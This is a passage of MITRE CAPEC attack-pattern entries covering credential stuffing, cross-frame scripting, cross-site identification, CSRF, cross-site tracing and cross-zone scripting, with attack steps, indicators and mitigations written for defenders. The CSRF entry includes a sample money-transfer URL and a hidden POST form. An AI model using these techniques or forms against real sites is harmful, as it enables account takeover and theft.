Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	560	Use of Known Domain Credentials
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	16	Dictionary-based Password Attack
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	49	Password Brute Forcing
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	50	Password Recovery Exploitation
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	55	Rainbow Table Password Cracking
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	70	Try Common or Default Usernames and Passwords
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	101	Server Side Include (SSI) Injection
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	565	Password Spraying
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	568	Capture Credentials via Keylogger
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	151	Identity Spoofing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	653	Use of Known Operating System Credentials

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

Techniques
An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
An adversary conducts a sniffing attack to steal credentials as they are transmitted.
An adversary gains access to a database and exfiltrates password hashes.
An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

Techniques
Determine minimum and maximum allowed password lengths.
Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

Attempt authentication: Try each username/password combination until the target grants access.
Techniques
Manually or automatically enter each username/password combination through the target's interface.

Exploit

Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application
Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.
Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

Prerequisites

The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.

The system/application does not have a sound password policy that is being enforced.

The system/application does not implement an effective password throttling mechanism.

The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target.

Skills Required

[Level: Low]

A Credential Stuffing attack is very straightforward.

Resources Required

A machine with sufficient resources for the job (e.g. CPU, RAM, HD).

A known list of username/password combinations.

A custom script that leverages the credential list to launch the attack.

Indicators

Many invalid login attempts are coming from the same machine (same IP address) or for multiple user accounts within short succession.

The login attempts use passwords that have been used previously by the user account in question.

Login attempts are originating from IP addresses or locations that are inconsistent with the user's normal IP addresses or locations.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authentication	Gain Privileges
Confidentiality Authorization	Read Data
Integrity	Modify Data

Mitigations

Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.

Create a strong password policy and ensure that your system enforces this policy.

Ensure users are not reusing username/password combinations for multiple systems, applications, or services.

Do not reuse local administrator account credentials across systems.

Deny remote use of local admin credentials to log into domain systems.

Do not allow accounts to be a local administrator on more than one system.

Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.

Monitor system and domain logs for abnormal credential access.

Example Instances

A user leverages the password "Password123" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.

In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised.

Related Weaknesses

CWE-ID	Weakness Name
522	Insufficiently Protected Credentials
307	Improper Restriction of Excessive Authentication Attempts
308	Use of Single-factor Authentication
309	Use of Password System for Primary Authentication
262	Not Using Password Aging
263	Password Aging with Long Expiration
654	Reliance on a Single Factor in a Security Decision

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1110.004	Brute Force:Credential Stuffing

Relevant to the OWASP taxonomy mapping

Entry Name
Credential stuffing

References

[REF-567] "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors". Cybersecurity and Infrastructure Security Agency (CISA). 2018-03-27. <https://www.us-cert.gov/ncas/alerts/TA18-086A>. URL validated: 2020-05-01.

[REF-568] "Credential stuffing". Open Web Application Security Project (OWASP). <https://owasp.org/www-community/attacks/Credential_stuffing>. URL validated: 2020-05-01.

[REF-569] Jessica Silver-Greenberg, Matthew Goldstein and Nicole Perlroth. "JPMorgan Chase Hacking Affects 76 Million Households". The New York Times. 2014-10-02. <https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/>. URL validated: 2020-05-01.

Content History

Submissions
Submission Date	Submitter	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)
Modifications
Modification Date	Modifier	Organization
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Extended_Description

CAPEC-587: Cross Frame Scripting (XFS)

Attack Pattern ID: 587

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	103	Clickjacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Avoid clicking on untrusted links.

Employ techniques such as frame busting, which is a method by which developers aim to prevent their site being loaded within a frame.

Example Instances

An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information.

Related Weaknesses

CWE-ID	Weakness Name
1021	Improper Restriction of Rendered UI Layers or Frames

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Cross Frame Scripting

References

[REF-469] "Cross Frame Scripting". OWASP. 2016. <https://www.owasp.org/index.php/Cross_Frame_Scripting>.

[REF-470] Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson. "Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites". 2010-07-20. <https://seclab.stanford.edu/websec/framebusting/framebust.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-02-01 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-02-01 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Abstraction, Mitigations, Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Example_Instances, Related_Attack_Patterns, Related_Weaknesses

CAPEC-467: Cross Site Identification

Attack Pattern ID: 467

Abstraction: Detailed

View customized information:

Description

Extended Description

There are many other ways in which the attacker may get the payload to execute in the victim's browser mainly by finding a way to hide it in some reputable site that the victim visits. The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	62	Cross Site Request Forgery

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

The victim has an active session with the social networking site.

Skills Required

[Level: High]

An attacker should be able to create a payload and deliver it to the victim's browser.

[Level: Medium]

An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker.

Mitigations

Usage: Users should always explicitly log out from the social networking sites when done using them.

Usage: Users should not open other tabs in the browser when using a social networking site.

Example Instances

An attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in their browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site.

Related Weaknesses

CWE-ID	Weakness Name
352	Cross-Site Request Forgery (CSRF)
359	Exposure of Private Personal Information to an Unauthorized Actor

References

[REF-404] Ronen. "Cross Site Identification - or - How your social network might expose you when you least expect it". 2009-12-27. <http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Example_Instances, Mitigations
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-62: Cross Site Request Forgery

Attack Pattern ID: 62

Abstraction: Standard

View customized information:

Description

Alternate Terms

Term: Session Riding

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	21	Exploitation of Trusted Identifiers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	467	Cross Site Identification

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

Techniques
Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

Techniques
Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
Create a form that will submit a POST request (e.g. <form method="POST" action="https://www.somebank.com/members/transfer.asp"><input type="hidden" Name="to" value="012345678901"/><input type="hidden" Name="amt" value="10000"/><input type="submit" src="clickhere.jpg"/></form>

Exploit

Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

Techniques
Execute a phishing attack and send the user an e-mail convincing them to click on a link.
Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.

Skills Required

[Level: Medium]

The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes.

Resources Required

All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.

Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.

Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.

In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context.

Example Instances

While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.

The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.

The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.

See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail.

Related Weaknesses

CWE-ID	Weakness Name
352	Cross-Site Request Forgery (CSRF)
306	Missing Authentication for Critical Function
664	Improper Control of a Resource Through its Lifetime
732	Incorrect Permission Assignment for Critical Resource
1275	Sensitive Cookie with Improper SameSite Attribute

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent)

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
09	Cross-Site Request Forgery

Relevant to the OWASP taxonomy mapping

Entry Name
Cross Site Request Forgery (CSRF)

References

[REF-62] Thomas Schreiber. "Session Riding: A Widespread Vulnerability in Today's Web Applications". SecureNet GmbH. <https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf>.

[REF-602] "OWASP Web Security Testing Guide". Testing for Cross Site Request Forgery. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Attack_Phases
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Attack_Phases
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Alternate_Terms, Attack_Phases
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Phases
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow, Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Cross Site Request Forgery (aka Session Riding)

CAPEC-107: Cross Site Tracing

Attack Pattern ID: 107

Abstraction: Detailed

View customized information:

Description

Extended Description

The adversary uses an XSS attack to have victim's browser sent an HTTP TRACE request to a destination web server, which will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. Since the HTTP header of the original HTTP TRACE request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary's malicious site. XST becomes relevant when direct access to the session cookie via the "document.cookie" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get their malicious script to issue an HTTP TRACE request to the destination system's web server.

Likelihood Of Attack

Medium

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Determine if HTTP Trace is enabled: Determine if HTTP Trace is enabled at the web server with which the victim has an active session
Techniques
An adversary may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response.

Experiment

Identify mechanism to launch HTTP Trace request: The adversary attempts to force the victim to issue an HTTP Trace request to the targeted application.
Techniques
The adversary probes for cross-site scripting vulnerabilities to force the victim into issuing an HTTP Trace request.

Exploit

Create a malicious script that pings the web server with HTTP TRACE request: The adversary creates a malicious script that will induce the victim's browser to issue an HTTP TRACE request to the destination system's web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the adversary.

Techniques
The adversary's malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim's session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response.

Execute malicious HTTP Trace launching script: The adversary leverages an XSS vulnerability to force the victim to execute the malicious HTTP Trace launching script
Intercept HTTP TRACE response: The adversary's script intercepts the HTTP TRACE response from teh web server, glance sensitive information from it, and forward that information to a server controlled by the adversary.

Prerequisites

HTTP TRACE is enabled on the web server

The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy

Scripting is enabled in the client's browser

HTTP is used as the communication protocol between the server and the client

Skills Required

[Level: Medium]

Understanding of the HTTP protocol and an ability to craft a malicious script

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data

Mitigations

Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default.

Patch web browser against known security origin policy bypass exploits.

Example Instances

An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An adversary realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with their malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim's session cookie to impersonate the victim in the target system.

In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that they control and get it to execute in the victim's browser (if they can trick the victim's into visiting their malicious website or clicking on the link that they supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary's malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable them to circumvent the same origin policy protection.

Related Weaknesses

CWE-ID	Weakness Name
693	Protection Mechanism Failure
648	Incorrect Use of Privileged APIs

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent)

Relevant to the OWASP taxonomy mapping

Entry Name
Cross Site Tracing

References

[REF-3] Jeremiah Grossman. "Cross-Site Tracing (XST)". WhiteHat Security. 2003. <http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Example_Instances
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Example_Instances, Execution_Flow, Related_Attack_Patterns, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-104: Cross Zone Scripting

Attack Pattern ID: 104

Abstraction: Standard

View customized information:

Description

Extended Description

In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	233	Privilege Escalation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Find systems susceptible to the attack: Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone.

Techniques
Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place.

Experiment

Find the insertion point for the payload: The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user's browser needs to be within the local machine zone.
Techniques
Finding weaknesses in functionality used by both privileged and unprivileged users.

Exploit

Craft and inject the payload: Develop the payload to be executed in the higher privileged zone in the user's browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload.

Techniques
The attacker makes it as likely as possible that the vulnerable functionality into which they have injected the payload has a high likelihood of being used by the victim.
Leverage cross-site scripting vulnerability to inject payload.

Prerequisites

The target must be using a zone-aware browser.

Skills Required

[Level: Medium]

Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands

Mitigations

Disable script execution.

Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone

Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone

Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum

Ensure proper HTML output encoding before writing user supplied data to the page

Example Instances

There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the "add video to chat" feature on attacker's video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. "Add video to chat" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed).

Related Weaknesses

CWE-ID	Weakness Name
250	Execution with Unnecessary Privileges
638	Not Using Complete Mediation
285	Improper Authorization
116	Improper Encoding or Escaping of Output
20	Improper Input Validation

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
